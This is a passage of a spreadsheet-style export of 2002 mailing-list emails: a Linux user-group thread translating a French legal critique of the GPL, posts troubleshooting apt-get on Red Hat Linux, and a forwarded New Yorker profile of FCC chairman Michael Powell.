    <t>Re: [ILUG] Interesting article on free software licences</t>
  </si>
  <si>
    <t>I have translated the article in full - see \nend of post (I think that I've done a far \nbetter job than the Google translation - at \nleast it's readable now - any corrections\nappreciated).\n\nStuff in {}'s is my (and others) additions \nto the debate.\n\nMy apologies if I've paraphrased anybody \nincorrectly, I will be glad to retract if \nanyone is miffed.\n\n\n\nThe article makes four main points.\n\n\n1) Absence of critical clauses. \n\n\nIn this case, the idea is that the licence \nis invalid because it doesn't specify\nunder what country's law the GPL is governed.\n\n\n2) Specification in English only.\n\nThat for the end user (as opposed to businesses), \nthe GPL doesn't apply because it's not written \nin French.\n\n\n3) Arbitary licence change.\n\nThe point here is that (under French law) the \nauthor can change the terms of the licence \narbitarily. This is because any granting of \nrights by an author must be clearly delimited\nin terms of how long, where, to whom, dates and \ntimes. In the absence of such limitations, the \noriginal author has the right to change his \nsoftware back to closed on a whim.\n\n\n{\n\nDavid Neary makes the point that the copyright \nholder automatically retains the right to change \nthe licence.\n\nScott replies it simply requires authorisation from \nall *copyright holders*\n\nThat's not my understanding. French law allows a \nGPL type licence *_on condition_* that the \nspecific conditions of the granting of such\nrights are clear - if they are not, there is\nnothing to stop the original author taking\nback "his work". The lawyers see this\n(correctly IMHO) as a weakness in the GPL).\n\n}\n\n\n\n4) Hidden defects.\n\nRoughly, this clause means that the author(s) \nis/are liable for any defects if the consumer \nis not an IT engineer, so if Linux blows up \nand data is lost, then the authors are liable.\n\n\n{\n\nCiaran Johnson says that M$oft and others have \nsimilar clauses - the point here is that they \nare *_all_* invalid - just that this one \naffects the GPL also.\n\nNiall O'Broinn makes the point that it is not\na sale, but rather a service/leasing arrangement\nand that's why it doesn't come under this point.\n\nI would suggest that the whole thrust of this\narticle has been to see software "sales" (even\nif no money changes hands) as governed very\nmuch by consumer law (in France anyway).\n\n\nRick Moen makes the point that it is not\na sale but rather a granting of rights which\nare not default. \n\nSee the bit about even the granting of \nrights by an author having to be \nexplicitly specified - under French law.\n\n\nThe fact that two IP lawyers in France think that\nthe GPL is covered as a sale make me feel that \nthere is a de facto sale and a de facto contract.\n\n}\n\n\n\n5) Roughly.\n\nThere may be other reasons under French \nlaw why the  GPL may be invalid.\n\n\n\n-----  Whole Article. -----------\n\n\nFreedom(a) is worth more than these \nimperfect licences.\n\n\nSpecialised lawyers look at the GPL.\n\n\n\nLawyer Cyril Rojinsky (duly appointed to \nthe court) and the jurist Vincent Grynbaum, both \nspecialised in the area of intellectual property \nexamine the "free" licences and in particular the \nGPL. They have published their study\nin the review "Proprietes intellectuelles \n(Intellectual property)[1]" and their\nconclusion is grim.\n\n\nTheir approach is interesting. The problem for \nthem is not to know whether freedom is valid under \nFrench law (for them the question is a moot point)\nbut rather they asked themselves about the form \nand the content of the text of free licences, and \nin particular the GPL. The problem is not free \nprogrammes, but rather the licence contracts of \nfree programmes.\n\n\n\nAbsence of critical clauses.\n\n\n\nThe authors tell us that first of all, the \nreference to "copyright" is not legally \nsufficient in the framework of international \ncontracts  (which is the case of licence \ncontracts for programmes developed and spread \nvia the Internet). The idea of copyright can \nbasically include differences from one country \nto another. This is why, under international \ncontracts, it is necessary to specify to which \nlaws one is referring (French law, American &amp;c.).\n\nThe authors only found three public licences \nwhich were correctly formulated on this point: \nQPL, IBM Public Licence and the Mozilla Public\nLicence).\n\n\n\nSpecification in the English language.\n\n\n\nNext, the authors remind us that (at least in \nFrance), no clause in a contract may be contrary \nto French law [2]. However, it turns out that a \nlicence such as the GPL is contrary to French law \nin several respects. Firstly, it is written in \nEnglish and the FSF doesn't officially approve \ntranslations. \n\nThe "Toubon law" obliges this sort \nof contract to be written in French, including for \nbusinesses since the notion of "user" applies not \nonly to consumers, but also to businesses, \nprofessionals &amp;c. \n\n\nContacted by the editors of LinuxFrench, \nlawyer Cyril Rojinsky declared that, as \nfar as business is concerned, the "Toubon \nlaw" is probably doomed to change since \nit is in contradiction of European directives \non the subject, but whatever about that, the \nproblem is still valid for individuals, and \nwhile waiting for it (French law) to change, \nFrench companies have to deal with it, since \nit is the law of the land.\n\n\nA programme under the GPL can suddenly \nchange licence.\n\n\nAnother problem, much more serious, is \nthat according to French law, the author of \na free programme can, at any time, invoke \nthe invalidity of the licence for this \nsoftware by simply changing the licence.\n\n\nIn effect, the law of intellectual \nproperty stipulates that the granting of  \nrights by the author is subordinate to \nthe condition that each of these granted \nrights be the object of a distinct clause \nin the granting act (i.e. the licence) and \nthat the granting of any such rights be \ndelimited with respect to its scope and its \ngrantees, and also with respect to its \nlocation (i.e. where such rights may be \nexcersised)  and duration of any such grants. \n[3] This is not the case of the GPL nor of\nother free licences. Briefly, this means \nthat in France, or elsewhere if the author \nis French, that which is under the GPL could \nrevert to proprietary from one day to the next. \n \n\n\nThe problem of the guarantee "hidden defects".\n\n\nAn other very serious flaw is that of the \nguarantee. The GPL licences and others show \nthat the software is delivered "without \nguarantee". You are going to immediately\nreply that commercical programmes carry the \nsame clause in their licence contracts,\nand this is correct. However, whatever is \nwritten in a licence contract, one cannot\nfree oneself from the "guarantee from \nhidden defects", since it is imposed in the \nCivil Code. This concept is poorly understood \nby the layman, it protects the buyer\n(whoever it may be, individual or business, \nsince it specifies the Civil Code and not \nconsumer protection law) against hidden \ndefects, deliberate or made in good faith by \nthe seller. \n\n\nFor example, if one buys a pair of socks \nin a sale, and the shop has a notice \nspecifying that "Sale items are neither \nrefunded nor exchanged", and on arriving \nhome you notice that one of the socks has \na hole in it, several scenarios are possible.\n\n\nYou could have checked the socks before \npurchase: the flaw is deemed "obvious" and\nyou can sing for your money.\n\n\nYou couldn't check the socks (they were \npackaged for example), and in this case, \ndespite the notice "neither refund nor \nexchange", you may invoke "hidden defect" \nand have them changed or obtain a refund, \nit's up to you. \n\nPersonally, I have already invoked in shops \nthe "hidden defect" clause and it always \nworked well (shopkeepers are always very \ncooperative if you quote a couple of words \nof the Civil Code). \n\n\nThe concept of hidden defect is rather \nwide, it is necessary that you hadn't \nthe possibility of discovering the defect \nbefore buying the product and then \n(according to the Civil Code) that you \nwouldn't have bought it at that price if \nyou had known about the\ndefect.\n\n\nThe third case which is much rarer , is \nif you are able to show that the vendor had\nknowledge of the defect (hidden), but didn't \ninform you. In this case, not only does he \nhave to reimburse the product, but all \nexpenses incurred by the sale (metro \ntickets to go to the shop, the fuse \nwhich blew when you plugged it in &amp;c.)\n\n\nThis idea of "hidden defect" applies to\n all products, including programmes. This \nwas made abundantly clear by the \nauthorities (and the courts) surrounding \nY2K. \n\nThis is particularly inconvenient for \nfree programmes, since a site which \noffers a Linux distro for download is \nsupposed to provide a guarantee against \nhidden flaws.\n\n\nLinuxFrench asked Cyril ROJINSKY if \nin the case of a free programme, \none could speak about a "hidden" defect \nsince the source code was available, \nhe replied "Actually, concerning the \nguarantee, the question of obvious \ndefect will arise. This analyis will \nbe different depending on whether the \nperson who downloads the distribution \nis an IT professional or not". \n\nOpenSource has this advantage over \nthe proprietary programme: it protects \nthe distributor against a guarantee of\nhidden defect insofar as the buy is an \nIT person. But, for distribution to the \npublic at large, the problem remains \nthe same.\n\n\n\nRoughly Speaking.\n\n\nLawyer Cyril ROJINSKY said it himself, \nthis study is far from being exhaustive \nand many other areas could be explored. \n\nDuring this interview, we asked ourselves, \nfor example, about the fragility of the \nGPL clause which forbids linking source \ncode under the GPL with proprietary code. \n\nIn effect, the laws of intellectual \nproperty give the right to the user \nto modify a programme with the\nintention of permitting interoperability \nwith another programme. If for that,\nI need to link with a proprietary library \n(communication protocol, device driver)\nI may consider as "null and void" this \nclause of the GPL.\n\n\nThe conclusion of this study is a wake \nup call for the community. "Freedom" \nmerits more than these shoddy licences, \nwhich should be modified before court \ncases over them proliferate and put at \nrisk the undeniable originality of \nthis effort.\n\n\n---------------------------\n\n\n[1] Une publication de l'Institut \nde recherche en proprit \nintellectuelle, No4 Juillet 2002\n\n[2] Une telle clause de contrat \nqui est oppose  ce que dit la Loi \nfranaise est qualifie en terme \njuridique de  clause rpute \nnon-crite , c'est--dire \nqu'on fait comme si cette clause \nn'tait pas crite dans le contrat. \n\nC'est pour cela par exemple que vous \npouvez signer un bail pour un \nappartement qui stipule que \nles enfants sont interdits dans \nl'immeuble, et envisager sans \ninquitude d'avoir quand mme \nun enfant, en effet le code civil \nstipule que le devoir d'un locataire \nd'un appartement doit se comporter \nen  bon pre de famille  \n\n[3] Article L131-3\n\n\n\n\n\n\n\n___________________________________________________________\nDo You Yahoo!? -- Une adresse @yahoo.fr gratuite et en franais !\nYahoo! Mail : [URL]http://fr.mail.yahoo.com[/URL]\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://fr.mail.yahoo.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Harri Haataja &lt;harri.haataja@cs.helsinki.fi&gt;\nDate: Tue, 8 Oct 2002 23:42:14 +0300</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 23:42:14 +0300</t>
  </si>
  <si>
    <t>Harri Haataja &lt;harri.haataja@cs.helsinki.fi&gt;</t>
  </si>
  <si>
    <t>On Tue, Oct 08, 2002 at 04:36:13PM +0200, Matthias Saou wrote: &gt; Two new things today : &gt;  &gt; 1) I've had to install a Red Hat Linux 6.2 server because of an old &gt; proprietary IVR software that doesn't work on newer releases :-( So &gt; I've recompiled both the latest apt and openssh packages for it, and &gt; they are now available with a complete "os, updates &amp; freshrpms" apt &gt; repository at apt.freshrpms.net, for those who might be interested. Oh, neat. I have similiar thing in my hands, though it might be migratable if I had the time to try. I've been using another 6.x repository though. [URL]http://apt-rpm.tuxfamily.org[/URL] Anyone tried (dist-)upgrade from 6.x to 7? Theoretically it should drop in some -compat's (notably libc) and upgrade the rest and after a reboot and maybe a new kernel (and grub, but I have long before put those to v6's :) run just fine. Haven't had a spare machine to try it on myself, though. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://apt-rpm.tuxfamily.org http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Steve Kann &lt;stevek@SteveK.COM&gt;\nDate: Tue, 8 Oct 2002 20:01:49 -0400</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 20:01:49 -0400</t>
  </si>
  <si>
    <t>Ack, apt-get still failing for me, stumped. [RH8]</t>
  </si>
  <si>
    <t>I posted about this last week, and I'm still stumped.  apt-get is just not working for me, and I can't figure out what the problem is. I've tried removing the apt rpms, making sure to remove any traces left behind (/etc/apt /var/state/apt /var/cache/apt), and still, I get "couldn't find package xmms-mp3" when running "apt-get install xmms-mp3". Any clues?  Here's a log of a fresh try: root@canarsie:/tmp # rpm -e apt apt-devel root@canarsie:/tmp # rm -rf /etc/apt /var/cache/apt /var/state/apt root@canarsie:/tmp # rpm -ivh apt-0.5.4cnc7-fr1.i386.rpm apt-devel-0.5.4cnc7-fr1.i386.rpm warning: apt-0.5.4cnc7-fr1.i386.rpm: V3 DSA signature: NOKEY, key ID e42d547b Preparing...                ########################################### [100%]    1:apt                    ########################################### [ 50%]    2:apt-devel              ########################################### [100%] root@canarsie:/tmp # apt-get update Ign [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386 release Get:1 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/os pkglist [1276kB] Get:2 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/os release [108B] Get:3 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/updates pkglist [14B] Get:4 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/updates release [113B] Get:5 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/freshrpms pkglist [57.1kB] Get:6 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/freshrpms release [125B] Get:7 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/os srclist [152kB] Get:8 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/updates srclist [14B] Get:9 [URL]http://apt.freshrpms.net[/URL] redhat/8.0/en/i386/freshrpms srclist [14.4kB] Fetched 1500kB in 11s (125kB/s) Reading Package Lists... Done root@canarsie:/tmp # apt-get install xmms-mp3 Reading Package Lists... Done Building Dependency Tree... Done E: Couldn't find package xmms-mp3 root@canarsie:/tmp # apt-cache search xmms root@canarsie:/tmp # Beats me.. -SteveK --    Steve Kann - Chief Engineer - 520 8th Ave #2300 NY 10018 -  (212) 533-1775                 HorizonLive.com - collaborate . interact . learn    "The box said 'Requires Windows 95, NT, or better,' so I installed Linux." _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: Fork@xent.com\nFrom: Rohit Khare &lt;khare@alumni.caltech.edu&gt;\nDate: Tue, 8 Oct 2002 19:29:41 -0700</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 19:29:41 -0700</t>
  </si>
  <si>
    <t>Lord of the Ringtones: Arbocks vs. Seelecks</t>
  </si>
  <si>
    <t>I can't believe I actually read a laugh-out-loud funny profile of the \n*FCC Commissioner* fer crissakes! So the following article comes \nrecommended, a fine explanation of Michael Powell's extraordinary \nequivocation.\n\nOn the other hand, I can also agree with Werbach's Werblog entry... Rohit\n\n&gt; A Trip to F.C.C. World\n&gt;\n&gt; Nicholas Lemann has a piece in the New Yorker this week about FCC \n&gt; Chairman Michael Powell. It's one of the first articles I've seen that \n&gt; captures some of Powell's real personality, and the way he's viewed in \n&gt; Washington. Unfortunately, Lemann ends by endorsing conventional \n&gt; political wisdom. After describing how Powell isn't really a \n&gt; fire-breathing ideological conservative, he concludes that, in essence, \n&gt; Powell favors the inumbent local Bell telephone companies, while a \n&gt; Democratic FCC would favor new entrants. I know that's not how Powell \n&gt; sees the world, and though I disagree with him on many issues, I think \n&gt; he's right to resist the old dichotomy.\n&gt;\n&gt; The telecom collapse should be a humbling experience for anyone who \n&gt; went through it. The disaster wasn't the regulators' fault, as some \n&gt; conservatives argue. But something clearly went horribly wrong, and \n&gt; policy-makers should learn from that experience. Contrary to Lemann's \n&gt; speculation, the upstart carriers won't be successful in a Gore \n&gt; administration, because it's too late. Virtually all of them are dead, \n&gt; and Wall Street has turned off the capital tap for the foreseeable \n&gt; future. Some may survive, but as small players rather than \n&gt; world-dominators.\n&gt;\n&gt; The battle between CLECs and RBOCs that Lemann so astutely parodies is \n&gt; old news. The next important battle in telecom will be between those \n&gt; who want to stay within the traditional boxes, and those who use \n&gt; different models entirely. That's why open broadband networks and open \n&gt; spectrum are so important. Whatever the regulatory environment, there \n&gt; is going to be consolidation in telecom. Those left out in that \n&gt; consolidation will face increasing pressure to create new pipes into \n&gt; the home, or slowly die. The victors in the consolidation game will cut \n&gt; back on innovation and raise prices, which will create further pressure \n&gt; for alternatives.\n&gt;\n&gt; Lemann is right that policy-making looks much drier and more ambiguous \n&gt; on the ground than through the lens of history. But he's wrong in \n&gt; thinking that telecom's future will be something like its past.\n&gt;\n&gt; Friday, October 04, 2002\n&gt; 11:17:11 AM comments{0}\n\n==============================================================\n[URL]http://www.newyorker.com[/URL]\n\nTHE CHAIRMAN	\nby NICHOLAS LEMANN\nHe's the other Powell, and no one is sure what he's up to.\nNew Yorker, October 8, 2002\n\nLast year, my middle son, in eighth grade and encountering his first \nfairly serious American-history course, indignantly reported that the \nwhole subject was incomprehensible. I was shocked. What about Gettysburg \nand the Declaration of Independence and the Selma-to-Montgomery march? \nJust look at my textbook, he said, and when I did I saw his point. His \nclass had got up to the eighteen-forties. What I expected was a big \nbeefing up of the roles of Sacagawea and Crispus Attucks, and, in-deed, \nthere was some of that. But the main difference between my son's text \nand that of my own childhood was that somebody had made the disastrous \ndecision to devote most of it to what had actually happened in American \nhistory. There were pages and pages on tariffs and bank charters and \nreciprocal trade agreements. I skipped ahead, past the Civil War, hoping \nfor easier going, only to encounter currency floats and the regulation \nof freight rates. Only a few decades into the twentieth century did it \nbecome possible to see the federal government's main function as \nresponding to dramatic crises and launching crusades for social justice, \ninstead of attempting to referee competing claims from economic \ninterests.\n\nEven now, if one were to reveal what really goes on behind the pretty \nspeeches and the sanctimonious hearings in Washington, what you'd find \nis thousands of lawyers and lobbyists madly vying for advantage, not so \nmuch over the public as over each other: agribusiness versus real \nestate, banks versus insurance companies, and so on. The arena in which \nthis competition mainly takes place is regulatory agencies and \ncommissions and the congressional committees that supervise them. It's \nan insider's game, less because the players are secretive than because \nthe public and the pressencouraged by the players, who speak in jargon\ncan't get themselves interested.\n\nOne corner of Washington might be called F.C.C. World, for the Federal \nCommunications Commission. F.C.C. World has perhaps five thousand \ndenizens. They work at the commission itself, at the House and Senate \ncommerce committees, and at the Washington offices of the companies that \nthe commission regulates. They read Communications Daily (subscription \nprice: $3,695 a year), and every year around Christmastime they \ngrumblingly attend the Chairman's Dinner, at a Washington hotel, where \nthe high point of the evening is a scripted, supposedly self-deprecating \ncomedy routine by the commission's chairman.\n\nOf all the federal agencies and commissions, the F.C.C. is the one that \nAmericans ought to be most interested in; after all, it is involved with \na business sector that accounts for about fifteen per cent of the \nAmerican economy, as well as important aspects of daily lifetelephone \nand television and radio and newspapers and the Internet. And right now \nF.C.C. World is in, if not a crisis, at least a very soapy lather, \nbecause a good portion of what the angry public thinks of as the \n"corporate scandals" concerns the economic collapse of companies \nregulated by the F.C.C. Qwest, WorldCom, Adelphia, and Global Crossing, \namong others, are (or were) part of F.C.C. World. AOL Time Warner is \npart of F.C.C. World. Jack Grubman, the former Salomon Smith Barney \nanalyst who seems to have succeeded Kenneth Lay, of Enron, as the \nembodiment of the corporate scandals, is part of F.C.C. World. In the \npast two years, companies belonging to F.C.C. World have lost trillions \nof dollars in stock-market valuation, and have collectively served as a \ndead weight pulling down the entire stock market.\n\nThis year, an alarmed and acerbic anonymous memorandum about the state \nof the F.C.C. has been circulating widely within F.C.C. World. It evokes \nF.C.C. World's feverish mood ("The F.C.C. is fiddling while Rome burns") \nand suggests why nobody besides residents of F.C.C. World has thought of \nthe commission in connection with the corporate scandals. The sentence I \njust quoted is followed by this explanation: "The ILECs appear likely to \nenter all l.d. markets within twelve months, while losing virtually no \nresidential customers to attackers since 1996, and suffering about 10% \nmarket share loss in business lines to CLECs." It's a lot easier to \nthink about evil C.E.O.s than to decipher that.\n\n\nEven in good times, F.C.C. World pays obsessive attention to the \ncommission's chairman. In bad times, the attention becomes especially \nintense; and when the chairman is a celebrity F.C.C. World devotes \nitself to full-time chairman-watching. The current chairman, Michael \nPowell, is a celebrity, at least by government-official standards, \nbecause he is the only son of Colin Powell, the Secretary of State. \nUnlike his father, he has a kind of mesmerizing ambiguity, which \ngenerates enormous, and at times apoplectically toned, speculation about \nwho he really is and what he's really up to. Powell is young to be the \nhead of a federal agencyhe is thirty-nineand genially charming. \nEverybody likes him. Before becoming chairman, he was for three years \none of the F.C.C.'s five commissioners; not only is he fluent in the \nF.C.C.'s incomprehensible patois, he has a Clintonesque love of the \narcane details of communications policy. He's always saying that he's an \n"avid moderate." And yet he has a rage-inciting quality. One of his \npredecessors as chairman, Reed Hundt, quoted in Forbes, compared Powell \nto Herbert Hoover. Mark Cooper, of the Consumer Federation of America, \ncalls him "radical and extreme." Just as often as he's accused of being \na right-wing ideologue, Powell gets accused of being paralytically \ncautious. "It ain't about singing 'Kum-Ba-Yah' around the campfire," \nanother former chairman, William Kennard, says. "You have to have an \nanswer." One day last spring, Powell, testifying before a Senate \nsubcommittee, delivered an anodyne opening statement, and the \nsubcommittee's chairman, Ernest Hollings, of South Carolina, berated \nhim. "You don't care about these regulations," Hollings said. "You don't \ncare about the law or what Congress sets down. . . . That's the \nfundamental. That's the misgiving I have of your administration over \nthere. It just is amazing to me. You just pell-mell down the road and \nseem to not care at all. I think you'd be a wonderful executive \nvice-president of a chamber of commerce, but not a chairman of a \nregulatory commission at the government level. Are you happy in your \njob?"\n\n"Extremely," Powell said, with an amiable smile.\n\n\nOne cannot understand Powell's maddening effect, at least on Democrats \nand liberal activists, without understanding not just the stated purpose \nof the commission he chairs but also its real purpose. The F.C.C. was \ncreated by Congress in 1934, but it existed in prototype well before the \nNew Deal, because it performs a function that is one of the classic easy \ncases for government intervention in the private economy: making sure \nthat broadcasters stick to their assigned spots on the airwaves. Its \nother original function was preventing American Telephone &amp; Telegraph, \nthe national monopoly phone company, from treating its customers \nunfairly. Over the decades, as F.C.C. World grew up into a comfortable, \nwell-established place, the F.C.C. segued into the role of industrial \nsupervisionits real purpose. It was supposed to manage the competition \namong communications companies so that it didn't become too bloody, by \nartfully deciding who would be allowed to enter what line of business. \nIn addition to looking out for the public's interest, the commission \nmore specifically protected the interests of members of Congress, many \nof whom regard the media companies in their districts as the single most \nterrifying category of interest groupyou can cross the local bank \npresident and live to tell the tale, but not the local broadcaster. \nAccording to an oft-told F.C.C. World anecdote, President Clinton once \nblocked an attempt to allow television stations to buy daily newspapers \nin the same city because, he said, if the so-and-so who owned the \nanti-Clinton Little Rock Democrat-Gazette had owned the leading TV \nstation in Little Rock, too, Clinton would never have become President.\n\n\nF.C.C. World may have been con tentious, but it was settled, too, \nbecause all the reasonably powerful players had created secure economic \nniches for themselves. Then, in the nineteen-eighties, the successful \nbreakup of A.T. &amp; T.by far the biggest and most important company the \ncommission regulateddeposited a thick additional sediment of \nself-confidence onto the consciousness of F.C.C. World. A generation \nago, for most Americans, there was one local phone company, one \nlong-distance company, and one company that manufactured telephones, \nwhich customers were not permitted to ownand they were all the same \ncompany. It was illegal to plug any device into a phone line. By the \nmid-nineteen-nineties, there were a dozen economically viable local \nphone companies, a handful of national long-distance companies competing \nto offer customers the lowest price and best service, and stores \neverywhere selling telephone equipment from many manufacturersand \nmillions of Americans had a fax machine and a modem operating over the \ntelephone lines. A.T. &amp; T. had argued for years that it was a "natural \nmonopoly," requiring protection from economic competition and total \ncontrol over its lines. So much for that argument. Over the same period, \nthe F.C.C. had assisted in the birth of cable television and cell phones \nand the Internet. It was the dream of federal-agency success come true: \nconsumers vastly better served, and the industry much bigger and more \nprosperous, too.\n\nThe next big step was supposed to be the Telecommunications Act of 1996, \none of those massive, endlessly lobbied-over pieces of legislation which \nmost people outside F.C.C. World probably felt it was safe to ignore. \nAlthough the Telecom Act sailed under the rhetorical banner of \nmodernization and deregulation, its essence was a grand interest-group \nbargain, in which the local phone companies, known to headline writers \nas "baby Bells" and to F.C.C. World as "arbocks" (the pronounced version \nof RBOCs, or regional Bell operating companies), would be permitted to \noffer long-distance service in exchange for letting the long-distance \ncompanies and smaller new phone companies use their lines to compete for \ncustomers. Consumers would win, because for the first time they would \nget the benefits of competition in local service while getting even more \ncompetition than they already had in long distance. But the politics and \neconomics of the Telecom Act (which was shepherded through Congress by \nVice-President Gore) were just as important. Democrats saw the act as \nhelping to reposition them as the technology partythe party that \nbrought the Internet into every home, created hundreds of thousands of \njobs in new companies, and, not least, set off an investment boom whose \nbeneficiaries might become the party's new contributor base. Clinton's \nslogans about the "information superhighway" and "building a bridge to \nthe twenty-first century," which, like all Clinton slogans, artfully \nsent different messages to different constituencies, were the rhetorical \ncorrelates of the Telecom Act, and Gore's cruise to the Presidency was \nsupposed to be powered substantially by the act's success.\n\nThe F.C.C. had a crucial role in all this. The arbocks are rich, \naggressive, politically powerful, and generally Republican (though like \nall important interest groups they work with both parties); they \nimmediately filed lawsuits, which wound up tying the hands of their new \ncompetitors in the local phone market for more than three years. Through \nrule-making, enforcement, and litigation, the F.C.C., then headed by \nReed Hundt, who was Gore's classmate at St. Albans, was supposed to keep \nthe arbocks in their cages, so that not only long-distance companies \nlike A.T. &amp; T. and MCI WorldCom but also a whole category of new \ncompanies, "see-lecks" (the pronounced version of CLECs, or competitive \nlocal exchange carriers), could emerge. This entailed the regulatory \nequivalent of hand-to-hand combat: the see-leck is supposed to have \naccess to the arbock's switching equipment, the arbock won't give the \nseeleck a key to the room where it's kept, so the see-leck asks the \nF.C.C. to rule that the arbock has to give it the key.\n\nPartly because Hundt assured the see-lecks and other new companies that \nhe would protect them, and partly because of the generally booming \ncondition of the economy then, investment capital flooded into the \nsee-leckscompanies with names like Winstar, Covad, and Teligentand \ninto other telecommunications companies. Even not obviously related \ntechnology companies like Cisco Systems benefitted from the telecom \nboom: demand for their products was supposed to come from the see-lecks \nand other new players. There would be no conflict between the interests \nof the new telecom companies and those of consumers; as one of Hundt's \nformer lieutenants told me, "Reed used to joke that my job was to make \nsure that all prices went down and all stocks went up."\n\n\nThe years following the passage of the Telecom Act were the peak of the \nboom. Wall Street had its blood up, and that meant not just more \nstartups but also more mergers of existing communications companies: \nTime Warner and AOL decided to throw in together, and A.T. &amp; T. and \nComcast, and so on. (Surely, WorldCom and the other telecom bad guys \nbelieved that their self-dealing, stock-overselling, and creative \naccounting would go unnoticed because the market was so \nundiscriminating.)\n\nBy the time the outcome of the 2000 Presidential election had been \ndetermined, the telecom crash was well under way. Nonetheless, the \nchairmanship of the F.C.C. remained one of the best jobs, in terms of \ninfluence and visibility, available to a career government regulator. \nThree Republicans emerged as candidates: Powell, who was a commissioner; \nHarold Furchtgott-Roth, the farthest-to-the-right commissioner; and \nPatrick Wood, the head of the Texas Public Utility Commission and, as \nsuch, a George W. Bush guy. In Texas, however, Wood had crossed the most \npowerful person in the arbock camp, Edward Whitacre, the C.E.O. of \nS.B.C. Communications, which is headquartered in San Antonio. This meant \nthat the arbocks didn't want Wood as head of the F.C.C., because he \nmight be too pro-see-leck. (Wood is now the head of the Federal Energy \nRegulatory Commission.) Michael Powell had to signal the arbocks that he \nwasn't as threatening as Wood, while also signalling the conservative \nmovement that he was only negligibly farther to the left than \nFurchtgott-Roth.\n\nPowell did this deftly. For example, in December of 2000 he appeared \nbefore a conservative group called the Progress &amp; Freedom Foundation and \ngave a very Michael Powell speechwhimsical, intellectual, and \nfree-associative (Biblical history, Joseph Schumpeter, Moore's Law)that \nbegan by making fun of the idea that the F.C.C. should try to keep new \ntelecom companies alive. "In the wake of the 1996 Act, the F.C.C. is \noften cast as the Grinch who stole Christmas," Powell said. "Like the \nWhos, down in Who-ville, who feast on Who-pudding and rare Who-roast \nbeast, the communications industry was preparing to feast on the \nderegulatory fruits it believed would inevitably sprout from the Act's \nfertile soil. But this feast the F.C.C. Grinch did not like in the \nleast, so it is thought." Thus Powell was indicating that if he became \nchairman he didn't expect to administer first aid to the see-lecks as \npart of the job. He was appointed to the chairmanship on the first day \nof the Bush Administration.\n\nTwenty months into the Administration, nearly all the see-lecks are dead \nor dying; nearly all long-distance companies, not just WorldCom, are in \nserious trouble; cable companies have lost half their value; satellite \ncompanies are staggering. The crash has had an automatically \nconcentrating effect, because as new companies die the existing \ncompanies' market share increases, and, if the existing companies are in \ngood shape financially, they have the opportunity to pick up damaged \ncompanies at bargain prices. During the Bush Administration, as the \nfinancial carnage in communications has worsened, the communications \nindustry has moved in the direction of more concentration. If the Bells \nwind up protecting their regional monopolies in local phone service, and \nif they also merge, the country will be on its way to having a national \nduopoly in local service: Verizon, in the East, and S.B.C., in the West. \nAnd these companies could dominate long distance as well, because of the \npoor health of the long-distance companies.\n\nThe cable business also seems close to having two dominant national \ncompanies, AOL Time Warner and Comcast. Unlike the phone companies, they \ndon't have to share their wiring with other companies and so can more \nfully control what material they allow to enter people's homes. As part \nof the complicated bargaining with interest groups that led to the 1996 \nTelecom Act, the limits on concentration in the radio industry were \nsignificantly loosened, and in the past six years the number of \nradio-station owners in the United States has been cut by twenty-five \nper cent; today, a large portion of local and national radio news \nprogramming is supplied by a single company, Westwood One, a subsidiary \nof Viacom.\n\nIn this situation, many Democrats and liberals think, the F.C.C. should \nbe hyperactivethe superhero of government regulation, springing to the \nrescue of both consumers and the communications industry. It should try \nto breathe life into the see-lecks and other new companies. It should \ndisallow mergers, maintain ownership limits, and otherwise restrain the \nforces of concentration. It should use the government's money and muscle \nto get new technologyespecially fast Internet connectionsinto the \nhomes of people who can't afford it at current market prices. (An \nanalogy that a lot of people in F.C.C. World make is between telecom and \nthe Middle East: the Clinton people blame the bloodshed on the Bush \npeople, because they disengaged when they came into office, and the Bush \npeople blame it on the Clinton people, because they raised too many \nexpectations and stirred too many passions.)\n\nBut Michael Powell's F.C.C. has not been hyperactive. Powell has been \nconducting internal policy reviews and reforming the management of the \nF.C.C. and waiting for the federal courts and the Congress to send him \nsignals. (In mid-September, Powell finally initiated a formal review of \nthe F.C.C.'s limits on media concentration.) This doesn't mean he has \nbeen inactive; rather, he has been active in a way that further \ninfuriates his criticsin a manner that smoothly blends the genial and \nthe provocative, he muses about whether the fundamental premises of \nF.C.C. World really make sense, while giving the impression that he's \nhaving the time of his life as chairman. At his first press conference, \nwhen he was asked what he was going to do about the "digital \ndivide"that is, economic inequality in access to the Internethe said, \n"You know, I think there is a Mercedes divide. I'd like to have one and \nI can't afford one." At the National Cable &amp; Telecommunications \nAssociation convention, in Chicago, Powell, following a troupe of \ntumblers to the stage, interrupted his walk to the podium to perform a \nsomersault.\n\n\nNot long ago, I went to see Powell in his office at the F.C.C. Until \n1998, when the commission moved to a new building in Southwest \nWashington, near the city's open-air fish market, F.C.C. World was at \nthe western edge of downtown, where everybody would encounter everybody \nelse at a few familiar restaurants and bars. Today, the F.C.C. building \nlooks like the office of a mortgage company in a suburban office park. \nEven the chairman's suite, though large, is beige, carpeted, and \nfluorescent. Powell is a bulky man who wears gold-rimmed glasses and \nwalks with a pronounced limp, the result of injuries he suffered in a \njeep accident in Germany, in 1987, when he was an Army officer. Because \nof the accident, he left the Army and went to law school, where he \nbecame entranced with conservative ideas about regulation, particularly \nthe idea that the government, rather than trying to correct the flaws of \nthe market before the fact"prophylactically," 